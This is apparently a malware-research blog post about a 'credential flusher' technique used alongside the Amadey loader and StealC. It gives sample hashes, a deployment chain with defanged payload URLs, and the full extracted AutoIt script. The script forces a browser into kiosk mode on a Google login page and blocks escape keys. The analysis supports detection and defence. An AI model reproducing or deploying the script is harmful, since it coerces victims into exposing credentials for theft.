# AutoIt Credential Flusher
> Forcing users to enter credentials so they can be stolen
- toc: true 
- badges: true
- categories: [credflusher,kiosk,stealer,stealc,amadey,autoit]

## Overview

We have recently observed a new technique used by stealers to force victims into entering credentials into a browser, allowing them to be stolen from the browser's credential store using traditional stealer malware. This technique dates back to at least August 22, 2024, and has been used in conjunction with [StealC malware](https://www.unpac.me/search?terms=bWFsd2FyZToiU3RlYWxjIg%3D%3D). Intelligence from our partners at the [Loader Insight Agency](https://loaderinsight.agency/) has revealed that this technique is mainly deployed by [Amadey](https://loaderinsight.agency/?p=amadey) when dropping StealC.

## Samples
The following samples provide an example of the technique implemented as an AutoIt script, though a more comprehensive graph of samples is available via [UnpacMe PIVOT](https://pivot.unpac.me/?graph=d05ad317-d6d5-4065-b368-86238d3ea0ae).
- `b119eb3e182224d5399b12f7f106ffd27a0f12dd418a64aa23425000adbc44de` [UnpacMe](https://www.unpac.me/results/2d4f2624-17dc-4d0a-8e18-30fd6ecedcf3?hash=b119eb3e182224d5399b12f7f106ffd27a0f12dd418a64aa23425000adbc44de)
- `53aeb2fd2ee3a30d29afce4d852e4b33e96b0c473240691d6d63796caa3016f2` [UnpacMe](https://www.unpac.me/results/e20308ba-353e-4b99-ae27-38d9c30c1157?hash=53aeb2fd2ee3a30d29afce4d852e4b33e96b0c473240691d6d63796caa3016f2)
- `78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078` [UnpacMe](https://www.unpac.me/results/135c3dff-3159-4738-83ed-ed04cc09d3a8?hash=78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078)


## Attack Analysis 
The technique involves launching the victim's browser in kiosk mode and navigating to the login page of the targeted service, usually Google. [Kiosk mode](https://learn.microsoft.com/en-us/deployedge/microsoft-edge-configure-kiosk-mode) forces the browser into full-screen mode and prevents the victim from closing or navigating away from the webpage. This tactic annoys the victim into entering their credentials in an attempt to close the window. Once the credentials are entered, they are stored in the browser's credential store on disk and can be stolen using stealer malware, which is deployed along with the credential flusher.

![](https://i.imgur.com/EJknwZG.png)


### Deployment 
The credential flusher is not a credential stealer itself; it is simply used to pressure the victim into entering their credentials, so it must be used in conjunction with a stealer. Using intelligence provided by the [Loader Insight Agency](https://loaderinsight.agency/), an example deployment is mapped below (see [PIVOT](https://pivot.unpac.me/?graph=39888f81-a73c-4794-80cd-3da7fa9baa25) for full details). 

- First, the victim is infected with [Amadey](https://research.openanalysis.net/cpp/stl/amadey/loader/config/2022/11/13/amadey.html) `0ec952da5d48ceb59202823d7549139eb024b55d93c2eaf98ca6fa99210b4608`
- Amadey is then used to load StealC `99e3eaac03d77c6b24ebd5a17326ba051788d58f1f1d4aa6871310419a85d8af` from `http[:]//31.41.244[.]11/steam/random.exe`
- Amadey then loads the Credential Flusher `78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078` from `http[:]//31.41.244[.]11/well/random.exe`
- The Credential Flusher then launches the browser in kiosk mode to force the victim into entering their credentials, which can then be stolen by Stealc.

![](https://i.imgur.com/QOKaW2x.png)


### AutoIt Version
The Credential Flusher is implemented as a simple AutoIt script that identifies which browsers are available on the victim's host, then launches the preferred browser in kiosk mode and navigates to the service targeted for credential theft. In the example below, Google is the target: `https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password`.

The AutoIt script is packaged into an AutoIt2Exe binary, for example, `78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078` [UnpacMe](https://www.unpac.me/results/135c3dff-3159-4738-83ed-ed04cc09d3a8?hash=78f4bcd5439f72e13af6e96ac3722fee9e5373dae844da088226158c9e81a078). UnpacMe has extracted the following credential flusher script.

```
LOCAL $PRIMARYBROWSER = "" 
LOCAL $PRIMARYCLASS = "" 
FUNC CLOSEBROWSER( $CLASS ) 
WHILE WINEXISTS ( $CLASS ) 
WINCLOSE ( $CLASS , "" ) 
SLEEP ( 0x000001f4 ) 
WEND 
ENDFUNC 
FUNC OPENBROWSER( $PRIMARYBROWSER , $PRIMARYCLASS ) 
LOCAL $URL = "https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password" 
IF STRINGINSTR ( $PRIMARYBROWSER , "msedge.exe" ) THEN 
RUN ( $PRIMARYBROWSER & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $URL ) 
ELSE 
RUN ( $PRIMARYBROWSER & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $URL ) 
ENDIF 
SLEEP ( 0x000007d0 ) 
LOCAL $HWND = WINGETHANDLE ( $PRIMARYCLASS ) 
WHILE 0x00000001 
IF NOT WINEXISTS ( $HWND ) THEN 
IF STRINGINSTR ( $PRIMARYBROWSER , "msedge.exe" ) THEN 
RUN ( $PRIMARYBROWSER & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $URL ) 
ELSE 
RUN ( $PRIMARYBROWSER & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $URL ) 
ENDIF 
SLEEP ( 0x000007d0 ) 
$HWND = WINGETHANDLE ( $PRIMARYCLASS ) 
ENDIF 
WINSETONTOP ( $HWND , "" , 0x00000001 ) 
IF NOT WINACTIVE ( $HWND ) THEN 
WINACTIVATE ( $HWND ) 
ENDIF 
SLEEP ( 0x000001f4 ) 
WEND 
ENDFUNC 
CLOSEBROWSER( "[CLASS:Chrome_WidgetWin_1]" ) 
CLOSEBROWSER( "[CLASS:MozillaWindowClass]" ) 
CLOSEBROWSER( "[CLASS:IEFrame]" ) 
IF FILEEXISTS ( "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" ) OR FILEEXISTS ( "C:\Program Files\Microsoft\Edge\Application\msedge.exe" ) THEN 
$PRIMARYBROWSER = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" 
$PRIMARYCLASS = "[CLASS:Chrome_WidgetWin_1]" 
ELSEIF FILEEXISTS ( "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" ) OR FILEEXISTS ( "C:\Program Files\Google\Chrome\Application\chrome.exe" ) THEN 
$PRIMARYBROWSER = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" 
$PRIMARYCLASS = "[CLASS:Chrome_WidgetWin_1]" 
ELSEIF FILEEXISTS ( "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" ) OR FILEEXISTS ( "C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\brave.exe" ) THEN 
$PRIMARYBROWSER = "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" 
$PRIMARYCLASS = "[CLASS:Chrome_WidgetWin_1]" 
ELSE 
EXIT 
ENDIF 
IF $PRIMARYBROWSER <> "" AND $PRIMARYCLASS <> "" THEN 
OPENBROWSER( $PRIMARYBROWSER , $PRIMARYCLASS ) 
ENDIF 
HOTKEYSET ( "{ESC}" , "IgnoreKey" ) 
HOTKEYSET ( "{F11}" , "IgnoreKey" ) 
FUNC IGNOREKEY( ) 
ENDFUNC 
WHILE TRUE 
SLEEP ( 0x00000064 ) 
WEND 
```
